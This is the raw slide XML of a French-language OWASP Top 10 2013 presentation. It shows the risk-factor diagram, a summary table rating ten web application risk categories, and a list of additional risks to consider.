      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 46"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="152400" y="6834173"/>
            <a:ext cx="6542964" cy="528362"/>
            <a:chOff x="142164" y="990769"/>
            <a:chExt cx="6542964" cy="528362"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="4" name="Group 47"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="142164" y="990769"/>
              <a:ext cx="6542964" cy="528362"/>
              <a:chOff x="142164" y="973597"/>
              <a:chExt cx="6542964" cy="528362"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="51" name="Rectangle 116"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2961564" y="997424"/>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fr-FR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Faille</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="fr-FR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>de sécurité</a:t>
                </a:r>
                <a:endParaRPr lang="fr-FR" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="6" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="476250" y="997424"/>
                <a:ext cx="139700" cy="304800"/>
                <a:chOff x="96" y="1344"/>
                <a:chExt cx="288" cy="624"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="61"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62"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3"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4"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65"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53" name="AutoShape 163"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1447800" y="1009331"/>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fr-FR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t> Vecteurs</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="fr-FR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="fr-FR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>d’attaque</a:t>
                </a:r>
                <a:endParaRPr lang="fr-FR" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="54" name="AutoShape 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4800600" y="973597"/>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fr-FR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t> Impacts</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="fr-FR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="fr-FR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>Techniques</a:t>
                </a:r>
                <a:endParaRPr lang="fr-FR" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="55" name="AutoShape 108"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:endCxn id="53" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="821288" y="1183156"/>
                <a:ext cx="626512" cy="4769"/>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7" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="51" idx="3"/>
                <a:endCxn id="54" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3981932" y="1187924"/>
                <a:ext cx="818668" cy="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58" name="Rectangle 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="142164" y="1302224"/>
                <a:ext cx="1066318" cy="199735"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="fr-FR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Agents de menace</a:t>
                </a:r>
                <a:endParaRPr lang="fr-FR" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="59" name="AutoShape 142"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5923128" y="997424"/>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fr-FR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Impacts</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="fr-FR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Métiers</a:t>
                </a:r>
                <a:endParaRPr lang="fr-FR" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="60" name="AutoShape 149"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="54" idx="4"/>
                <a:endCxn id="59" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="5486400" y="1187924"/>
                <a:ext cx="436728" cy="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56" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="53" idx="3"/>
                <a:endCxn id="50" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="2286000" y="1185541"/>
                <a:ext cx="575647" cy="238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49" name="AutoShape 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2885364" y="1014596"/>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50" name="Rectangle 49"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2861647" y="11551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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Note à propos des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>isques</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1996097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4124677877"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1066800"/>
          <a:ext cx="6858000" cy="1349690"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000"/>
              </a:tblGrid>
              <a:tr h="343850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1600" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Récapitulatif des facteurs de risque du Top 10</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" kern="120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95155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000" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Le tableau suivant représente une vue d'ensemble des risques de sécurité du Top 10 2013, et les facteurs assignés à chacun des risques. Ces facteurs ont été déterminés d'après les statistiques connues et en fonction de l'expérience de l'équipe OWASP Top 10. Pour une compréhension complète de ces risques pour votre application ou organisation, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" u="sng" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>vous devez examiner vos facteurs de menace spécifiques et les impacts commerciaux correspondants</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>. Une énorme faille de sécurité ne représentera pas forcément de risque sérieux s’il n'y a aucun agent menaçant capable d'effectuer l'attaque ou bien si les impacts commerciaux sont négligeables au vu des informations exposées.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Title 62"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Détails sur les facteurs de Risques </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Text Placeholder 64"/>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+F</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="68" name="Table 67"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3879924660"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="2438400"/>
          <a:ext cx="6857999" cy="4066502"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="990600"/>
                <a:gridCol w="753602"/>
                <a:gridCol w="1061688"/>
                <a:gridCol w="1137523"/>
                <a:gridCol w="1061688"/>
                <a:gridCol w="1061688"/>
                <a:gridCol w="791210"/>
              </a:tblGrid>
              <a:tr h="881612">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RISQUES</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="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318489">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>A1-Injection</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FACILE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COMMUNE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MOYENNEMENT</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SÉVÈRE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A2-Auth</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t> et </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>Sess</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MOYENNE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RÉPANDUE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MOYENNEMENT</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SÉVÈRE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A3-XSS</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MOYENNE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TRÈS RÉPANDUE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algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>FACILEMENT</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MODÉRÉ</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A4-Réf non</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>sécu</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>.</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FACILE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COMMUNE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FACILEMENT</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MODÉRÉ</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A5-Config</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FACILE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COMMUNE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FACILEMENT</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MODÉRÉ</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A6-Données</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DIFFICILE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baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RARE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MOYENNEMENT</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SÉVÈRE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A7-ACL </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>Fonc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>.</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FACILE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baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>COMMUNE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MOYENNEMENT</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MODÉRÉ</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A8-CSRF</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MOYENNE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COMMUNE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dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>FACILEMENT</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MODÉRÉ</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A9-Composants</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MOYENNE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RÉPANDUE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DIFFICILEMENT</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MODÉRÉ</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489">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>A10-Redirection</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>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MOYENNE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000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RARE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000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>FACILEMENT</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smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MODÉRÉ</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sz="1000" b="0" dirty="0"/>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251557862"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="6553200"/>
          <a:ext cx="6858000" cy="2590800"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000"/>
              </a:tblGrid>
              <a:tr h="359606">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600" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Risques additionnels à considérer</a:t>
                      </a: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r h="2231194">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000" dirty="0" smtClean="0"/>
                        <a:t>Le Top 10 couvre beaucoup de domaines, mais il existe d'autres risques que vous devez prendre en considération et évaluer pour votre entreprise. Certain apparaissent dans des versions antérieures du Top 10, d'autres non, il y a aussi toutes les nouvelles techniques d'attaques découvertes tous les jours. Voici une liste des risques de sécurité que vous devriez aussi examiner :</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="11430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4"/>
                        </a:rPr>
                        <a:t>Clickjacking</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="11430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5"/>
                        </a:rPr>
                        <a:t>Concurrency Flaws</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="11430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fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>Dénis de service</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>Présent</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>dans</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> le Top 10 de 2004 – Entrée 2004-A9)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="11430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baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>Expression Language Injection</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="11430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kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>Fuite</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>d’informations</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>sensibles</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> et </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>Mauvaise</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>gestion</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t> des </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
